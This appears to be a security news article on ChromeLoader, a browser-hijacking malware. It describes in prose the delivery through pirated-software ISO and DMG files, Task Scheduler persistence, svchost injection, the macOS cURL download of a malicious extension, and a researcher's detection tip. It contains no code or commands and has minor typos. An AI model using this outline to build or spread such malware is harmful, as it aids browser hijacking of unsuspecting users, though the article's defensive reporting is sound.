Beware a persistent and widespread browser hijacker capable of modifying browser settings and redirecting user traffic to advertisement sites. Security researchers are warning about an increase of ChromeLoader campaigns. The threat was first observed in early February, but is now going through a resurgence, warn RedCanary researchers.
A Look into ChromeLoader
Chromeloader is a persistent browser hijacking malware that introduces itself via an ISO file and tricks users into executing it. Its purpose is to carry out malvertising campaigns. The hijacker is distributed on websites for cracked software, such as cracked video games and pirated movies and TV series. The threat could also be included in the installers of pirated programs.
It is classified as a suspicious browser extension that redirects traffic, but since it uses PowerShell to inject itself into the browser, it shouldn’t be underestimated.
“If applied to a higher-impact threat—such as a credential harvester or spyware—this PowerShell behavior could help malware gain an initial foothold and go undetected before performing more overtly malicious activity, like exfiltrating data from a user’s browser sessions,” the researchers warned.
How Is ChromeLoader Propagated?
The browser hijacker comes in the form of an ISO file, masqueraded as a torrent or pirated software. Places of distribution include pay-per-install and social media platforms. Once executed, the file is extracted and mounted as a drive on the compromised computer. The ISO file also contains an executable that drops ChromelOADER and a .NEW wrapper for Windows Task Scheduler, used to gain persistence on the victim’s machine.
ChromeLoader also uses the so-called cross-process injection into svchost.exe. It is noteworthy that the injection is often used by legitimate applications but may be suspicious if the originating process is located on a virtual drive.
“It’s a good idea to keep an eye out for processes executing from file paths that don’t reference the default C:\drive and that initiate a cross-process handle into a process that is on the C:\drive. This will not only offer visibility into ChromeLoader activity, but also into the many worms that originate from removable drives and inject into C:\drive processes, like explorer.exe, to propagate on a victim’s machine,” the researchers said.
ChromeLoader macOS Version Also Available
The macOS version uses the same distribution technique, with the slight difference that it deploys “baited social media posts with QR posts or links”. These redirect users to malicious pay-per-install download sites. The macOS version uses a DMG file rather than an ISO file. This file contains an installer script that drops payloads for either Chrome or Safari. Once executed, the installer script initiates cURL to retrieve a ZIP file that contains the malicious browser extension, which is unzipped within the private/var/tmp directory. The final stage is executing the browser with command-line options to load the malicious extension.